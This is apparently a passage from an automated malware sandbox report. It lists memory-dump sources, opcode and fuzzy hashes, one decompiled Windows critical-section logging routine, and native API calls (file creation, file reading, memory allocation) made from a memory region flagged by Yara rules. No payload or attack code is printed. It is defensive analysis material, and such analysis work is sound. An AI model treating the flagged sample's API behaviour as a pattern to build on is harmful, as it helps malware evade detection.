                                  • Instruction Fuzzy Hash: DC9002A1601140434540B19948084165055B7E2381391C221A5448670CC6A8896DA2A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f35ddbcdeb86bbd7cd53a71a9eb82b573c5e7593e14400f710113eb5dfd0977
                                  • Instruction ID: 60879254f4dce77215baaa58b5ef322e0dc01fa4294532b92b4409c91d5f8138
                                  • Opcode Fuzzy Hash: 7f35ddbcdeb86bbd7cd53a71a9eb82b573c5e7593e14400f710113eb5dfd0977
                                  • Instruction Fuzzy Hash: 5C90027120144002D1407199844861B5045B7E1381F51C511E5419664CC655896EA261
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 79963a05b2db0769312c946b6c76f4b49b459b690fee73a6cd43c4624b2e4151
                                  • Instruction ID: c34ad746855ddc18a8e82bf7354af4e4c5b17ccb9e3075bf5b716d93701db543
                                  • Opcode Fuzzy Hash: 79963a05b2db0769312c946b6c76f4b49b459b690fee73a6cd43c4624b2e4151
                                  • Instruction Fuzzy Hash: 5A90026124100802D140719984187170046E7D1781F51C111A5018664DC6568A7D76F1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5545f04fe6d51fc7e9312fef755df04b8bf37b151dc422c84da54ba0539151d1
                                  • Instruction ID: 91968a5095059730241b073b04e7b2e4a9e06d4be4f3047325c06f9067227b9d
                                  • Opcode Fuzzy Hash: 5545f04fe6d51fc7e9312fef755df04b8bf37b151dc422c84da54ba0539151d1
                                  • Instruction Fuzzy Hash: 9090026120144442D14062994808B1F4145A7E2382F91C119A914A664CC955896D6761
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c5077cd0272ac419251021b04f995e2d2c87fd91930c90b727f62e575d528d2f
                                  • Instruction ID: 2cf3fd64b464971903909d1949d60d66a9abc8bb29f4f320b609942e7b2cb07a
                                  • Opcode Fuzzy Hash: c5077cd0272ac419251021b04f995e2d2c87fd91930c90b727f62e575d528d2f
                                  • Instruction Fuzzy Hash: 4290027120140402D1006199480C7570045A7D1382F51C111AA158665EC6A5C9A97571
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0f6e7ecb75b9bad78e624129ca25ac6b2cde47b477a1b8cb181c86a260967280
                                  • Instruction ID: b4f5184c1814633a9c0e37445e0277d6b40cbcafc6e692f00f6057b44de8a984
                                  • Opcode Fuzzy Hash: 0f6e7ecb75b9bad78e624129ca25ac6b2cde47b477a1b8cb181c86a260967280
                                  • Instruction Fuzzy Hash: 0590027120100802D104619948086960045A7D1381F51C111AB018765ED6A589A97171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1e6c00962674235f8b81f7c95f5c0c84af77041aa8d89a657990e4e85fce4bb
                                  • Instruction ID: abb28047a4b65fa6a75dea74c90990a5679c88bdf8ea4c666089f3ed10f85c5d
                                  • Opcode Fuzzy Hash: c1e6c00962674235f8b81f7c95f5c0c84af77041aa8d89a657990e4e85fce4bb
                                  • Instruction Fuzzy Hash: BD9002E1201140924500A2998408B1A4545A7E1381B51C116E6048670CC5658969A175
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 53a0c7ad794f226bcc1f929890a98ae3b71e9fc86b284c3ea39cfe6fa74f8aed
                                  • Instruction ID: 90db868ac1da76c0fd97485ea944bc5a41f1b018228acc47b38f7a5aba386e94
                                  • Opcode Fuzzy Hash: 53a0c7ad794f226bcc1f929890a98ae3b71e9fc86b284c3ea39cfe6fa74f8aed
                                  • Instruction Fuzzy Hash: 9E900271A05000129140719948186564046B7E17C1B55C111A5508664CC9948B6D63E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f6ac2a89500d7db7d5c3c459ee30ca2d06950321bc7908b22a6028de89b6200
                                  • Instruction ID: 14a718c78006cf1e8df464737b2ac41771e936b093f08341da3c82a27e74b0c0
                                  • Opcode Fuzzy Hash: 7f6ac2a89500d7db7d5c3c459ee30ca2d06950321bc7908b22a6028de89b6200
                                  • Instruction Fuzzy Hash: 75900265221000020145A599060851B0485B7D73D1391C115F640A6A0CC661897D6361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9aee380747773235e89c6532043fbc3d93feeae95382f8ee55d46e6bbdb0c276
                                  • Instruction ID: 728c84c82ce69c5de3b9ea38c88e8e582ab7cebf0184faaf8b87319b51376e91
                                  • Opcode Fuzzy Hash: 9aee380747773235e89c6532043fbc3d93feeae95382f8ee55d46e6bbdb0c276
                                  • Instruction Fuzzy Hash: 1290027131114402D110619984087160045A7D2381F51C511A5818668DC6D589A97162
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 788418f73fb5d7f7c338ff424bb53dbb3b431a65d2cf7afbcca3eac1343fcc36
                                  • Instruction ID: 07c35e9c387a935c82e539be96f6b0b9c27f12a0edf3e1939e53d4ba48f64031
                                  • Opcode Fuzzy Hash: 788418f73fb5d7f7c338ff424bb53dbb3b431a65d2cf7afbcca3eac1343fcc36
                                  • Instruction Fuzzy Hash: E7900271301000529500A6D95808A5A4145A7F1381B51D115A9008664CC59489796161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E0192FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                  				void* _t7;
                                  				intOrPtr _t9;
                                  				intOrPtr _t10;
                                  				intOrPtr* _t12;
                                  				intOrPtr* _t13;
                                  				intOrPtr _t14;
                                  				intOrPtr* _t15;
                                  
                                  				_t13 = __edx;
                                  				_push(_a4);
                                  				_t14 =  *[fs:0x18];
                                  				_t15 = _t12;
                                  				_t7 = E018DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                  				_push(_t13);
                                  				E01925720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                  				_t9 =  *_t15;
                                  				if(_t9 == 0xffffffff) {
                                  					_t10 = 0;
                                  				} else {
                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                  				}
                                  				_push(_t10);
                                  				_push(_t15);
                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                  				return E01925720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                  			}











                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0192FDFA
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0192FE01
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0192FE2B
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: 58d74615eaf30326e1242e818a4b544a14928d0f87ea5f915888e4e03260a6db
                                  • Instruction ID: 369415b27afc16e7d6872bb818ceb05f4d4aba4e702e6cd65eacb19685f711be
                                  • Opcode Fuzzy Hash: 58d74615eaf30326e1242e818a4b544a14928d0f87ea5f915888e4e03260a6db
                                  • Instruction Fuzzy Hash: 5EF0C272240211BBEA212A45DC02E73BB6AEB84B30F150218F628961D5DA62B920D7A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Executed Functions

                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,03044B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03044B77,007A002E,00000000,00000060,00000000,00000000), ref: 03049D9D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 3e232ea06e80e67ea3aca892590d871921c1215b8da9aaf311bae8686c7907db
                                  • Instruction ID: 98b55273b55994b562e73ab98403f052f2ac02f4deed65c948419f85fe48c5d1
                                  • Opcode Fuzzy Hash: 3e232ea06e80e67ea3aca892590d871921c1215b8da9aaf311bae8686c7907db
                                  • Instruction Fuzzy Hash: BF1123B6204108BFCB08CF98EC80DEB77ADEF8C750B148658FA5D97241C630E912CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,03044B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03044B77,007A002E,00000000,00000060,00000000,00000000), ref: 03049D9D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: fcec519d79e84f38b55987dc5800285e114209046ba6eb0e2354c2f6c6b25b2b
                                  • Instruction ID: b3d16a84511791603255f28c1a977b9680823530db2093a1fac36dfbe45783a7
                                  • Opcode Fuzzy Hash: fcec519d79e84f38b55987dc5800285e114209046ba6eb0e2354c2f6c6b25b2b
                                  • Instruction Fuzzy Hash: B601D6B2601508BFCB14DF98DC95EDB77AAEF8C740F118658FA1D97240C630E901CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,03044B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03044B77,007A002E,00000000,00000060,00000000,00000000), ref: 03049D9D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction ID: 574ae401194254dbca8f30cc0e954272aa4ff3743861a4d6eeb5e2028a452a06
                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction Fuzzy Hash: 32F0BDB2201208BFCB08CF88DC95EEB77ADAF8C754F158248BA1D97240C630E8118BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtReadFile.NTDLL(03044D32,5EB6522D,FFFFFFFF,030449F1,?,?,03044D32,?,030449F1,FFFFFFFF,5EB6522D,03044D32,?,00000000), ref: 03049E45
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: d1eda7aa3198bb95c62ab40ee05d0b51407d115eaae47390697213821f52469b
                                  • Instruction ID: df6e3735e44c29150e15d39a1d6d7c1685edef489286976f5010f89e7fabbc39
                                  • Opcode Fuzzy Hash: d1eda7aa3198bb95c62ab40ee05d0b51407d115eaae47390697213821f52469b
                                  • Instruction Fuzzy Hash: 73113CB2200204BFDB14DF99DC81EEB77ADEF8C764F158659FA5D97241C630E9118BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtReadFile.NTDLL(03044D32,5EB6522D,FFFFFFFF,030449F1,?,?,03044D32,?,030449F1,FFFFFFFF,5EB6522D,03044D32,?,00000000), ref: 03049E45
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction ID: 10a488b817bcff8709b2f8f2fb6a0508b879b11488c491bac89f61fbd826f1b9
                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction Fuzzy Hash: 7DF0A4B6200208AFDB14DF89DC91EEB77ADAF8C754F158258BA1D97241D630E9118BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03032D11,00002000,00003000,00000004), ref: 03049F69
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: bdc98880d5ea9751645c9c86458361fcd5c2894aacebc82e508431b5a59a9f4b
                                  • Instruction ID: af266f2791038c543b6516dda9ee3a2f5c492f69c47f4d9be9358b14b9424dbe
                                  • Opcode Fuzzy Hash: bdc98880d5ea9751645c9c86458361fcd5c2894aacebc82e508431b5a59a9f4b
                                  • Instruction Fuzzy Hash: 7EF0F8B6650208BFDB18DF98CC91EEB77ADAF88250F118159BA19A7251C631E911CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03032D11,00002000,00003000,00000004), ref: 03049F69
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction ID: e977bf2dde7d5ad5860e24f9b5457fae591d5014b54f23be2a03ac18b0f24e0a
                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction Fuzzy Hash: D1F015B6200208BFDB14DF89CC81EEB77ADAF88650F118158BE1897241C630F910CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtClose.NTDLL(03044D10,?,?,03044D10,00000000,FFFFFFFF), ref: 03049EA5
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 82cb5d96092ec4b7fcad9a6c871bb9faadd0436810646d2c0209840af69ba39a
                                  • Instruction ID: ce85a1f0ef0882555544335323eb462c4f902850821709e1f1103bd2c95bd4c2
                                  • Opcode Fuzzy Hash: 82cb5d96092ec4b7fcad9a6c871bb9faadd0436810646d2c0209840af69ba39a
                                  • Instruction Fuzzy Hash: 85E04F766001107FDB11DBB4CC95EE77B28EF49250F154594F958AB241C531EA04C690
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtClose.NTDLL(03044D10,?,?,03044D10,00000000,FFFFFFFF), ref: 03049EA5
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction ID: a3ba8db9b814a5d6326c0a9c67b526aecc3faf4b7f4374a5cb985cd5be7bd1bf
                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction Fuzzy Hash: 50D01776640314BBE710EF98CC85EE77BACEF88660F1544A9BA5C9B242C530FA0086E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7f11df7c3bc2a2f1bcb7d626a878b7015fe7a5ce3ecc0a284fb334cb229dc1bb
                                  • Instruction ID: bd2d96ffc324e77735a5ffd19e27cddaa46b4c39cbbc300d9f83ff119c792557
                                  • Opcode Fuzzy Hash: 7f11df7c3bc2a2f1bcb7d626a878b7015fe7a5ce3ecc0a284fb334cb229dc1bb
                                  • Instruction Fuzzy Hash: AC9002E120200103614671594414656410BD7E0245F61C031E1415590DC565E89171A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: bc32ba659efa0e5f32dc1ea777360b3e4ecfae50ffa06c497fed1f3ade3fcbc1
                                  • Instruction ID: cfeaa0b95ad8e90d47cc30f9a518d5578e2edd5e7aee350b580c8b5dd4719d9f
                                  • Opcode Fuzzy Hash: bc32ba659efa0e5f32dc1ea777360b3e4ecfae50ffa06c497fed1f3ade3fcbc1
                                  • Instruction Fuzzy Hash: 559002A5211001032146A55907045470147D7D5395761C031F1416550CD661E86161A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5862b3a7633ca896a9cc08a9519094e28488e5531256640c13e0c6fc7bda3f99
                                  • Instruction ID: 4e265e42ca294c79fd9d48d8215a57f6a50306a371475a8f178e0a5d918eb089
                                  • Opcode Fuzzy Hash: 5862b3a7633ca896a9cc08a9519094e28488e5531256640c13e0c6fc7bda3f99
                                  • Instruction Fuzzy Hash: FE9002B120100943F14161594404B860106D7E0345F61C026A0525654DC655E85175A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c9ec72b03f9d442a1aab08618439899e6b878197b995f2b7a21f06cd0e0f48bb
                                  • Instruction ID: 710803ad57dccac5d4252819a6897b506caec5c2edad03e151f01dc375df69ba
                                  • Opcode Fuzzy Hash: c9ec72b03f9d442a1aab08618439899e6b878197b995f2b7a21f06cd0e0f48bb
                                  • Instruction Fuzzy Hash: 159002B120108903F1516159840478A0106D7D0345F65C421A4825658DC6D5E89171A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3199ae874ce6da25bcc938346b81fdfab2baf8eb07dd908548d01c6d5e0cb205
                                  • Instruction ID: f5883fb8dd1977e673d7159fdeacdec6bd991e56ad2070da2939220ff3bdd337
                                  • Opcode Fuzzy Hash: 3199ae874ce6da25bcc938346b81fdfab2baf8eb07dd908548d01c6d5e0cb205
                                  • Instruction Fuzzy Hash: 0C9002B120504943F18171594404A860116D7D0349F61C021A0465694DD665ED55B6E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c6f101b9f650bfc9e5c47f31604093996c8393cab5a702ed5ee5bc9c6e20ccca
                                  • Instruction ID: 78dfe35c816269238fa566f75fe5d72f3421f3b50cc351c8574032620acbdd0b
                                  • Opcode Fuzzy Hash: c6f101b9f650bfc9e5c47f31604093996c8393cab5a702ed5ee5bc9c6e20ccca
                                  • Instruction Fuzzy Hash: C09002B120100903F1C17159440468A0106D7D1345FA1C025A0426654DCA55EA5977E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7707c24e8a5c61156567425cb5083fd1d5d6bb518fb5504fbffe43b85df07ccb
                                  • Instruction ID: e7d5771d3dc58d8afa72e72caecddc90755d1affec20fbef3e78c59a1e24e845
                                  • Opcode Fuzzy Hash: 7707c24e8a5c61156567425cb5083fd1d5d6bb518fb5504fbffe43b85df07ccb
                                  • Instruction Fuzzy Hash: 4E9002B131114503F151615984047460106D7D1245F61C421A0C25558DC6D5E89171A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 437098881432b1a6c28aaf9cd350999a980adee736f9d92da66ff56b60e0b0a9
                                  • Instruction ID: ceec62602441242fed9ebb60c03cc687ad7c2f3604ae801e4521d45b7b0821a6
                                  • Opcode Fuzzy Hash: 437098881432b1a6c28aaf9cd350999a980adee736f9d92da66ff56b60e0b0a9
                                  • Instruction Fuzzy Hash: DB9002A921300103F1C17159540864A0106D7D1246FA1D425A0416558CC955E86963A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ecb2372af7eca3466e7a410ee0083347bf2fbaca24ca45bd0fbe37f7ea06200e
                                  • Instruction ID: b18cbc87afb116b63b7c1fd09b8e0fca2bc528602f8ab0c55468abee79dc0015
                                  • Opcode Fuzzy Hash: ecb2372af7eca3466e7a410ee0083347bf2fbaca24ca45bd0fbe37f7ea06200e
                                  • Instruction Fuzzy Hash: CF9002B120100503F141659954086860106D7E0345F61D021A5425555EC6A5E89171B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 42006322e8384170154ef2b069edf84d143b27302fe3ba9d669d7cdb0bbb27cb
                                  • Instruction ID: 9ff61ee32a0e9662f0d4cb85eb3bbf9c3161983a351fe18c5692fca766182492
                                  • Opcode Fuzzy Hash: 42006322e8384170154ef2b069edf84d143b27302fe3ba9d669d7cdb0bbb27cb
                                  • Instruction Fuzzy Hash: 3B9002A1242042537586B15944045474107E7E0285BA1C022A1815950CC566F856E6A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e8bf45e8bed68bae66f28b29bdc9342c1923c0fb1f336e6f79317d161dee3883
                                  • Instruction ID: ac93b875802161a145ad8ac30e2b869f7a879f43dfe3bcb7891d5529b42466f5
                                  • Opcode Fuzzy Hash: e8bf45e8bed68bae66f28b29bdc9342c1923c0fb1f336e6f79317d161dee3883
                                  • Instruction Fuzzy Hash: 669002B120100513F15261594504747010AD7D0285FA1C422A0825558DD696E952B1A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 0363f99c8c68892554ad61f33b60fb33b91c3ae3db1c1d2f4ee4e30f3ff69526
                                  • Instruction ID: ce5c4741f8050338c4a1529b6947a37490cd086c04b479e7df2f1a0e23d0d93e
                                  • Opcode Fuzzy Hash: 0363f99c8c68892554ad61f33b60fb33b91c3ae3db1c1d2f4ee4e30f3ff69526
                                  • Instruction Fuzzy Hash: 849002E134100543F14161594414B460106D7E1345F61C025E1465554DC659EC5271A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
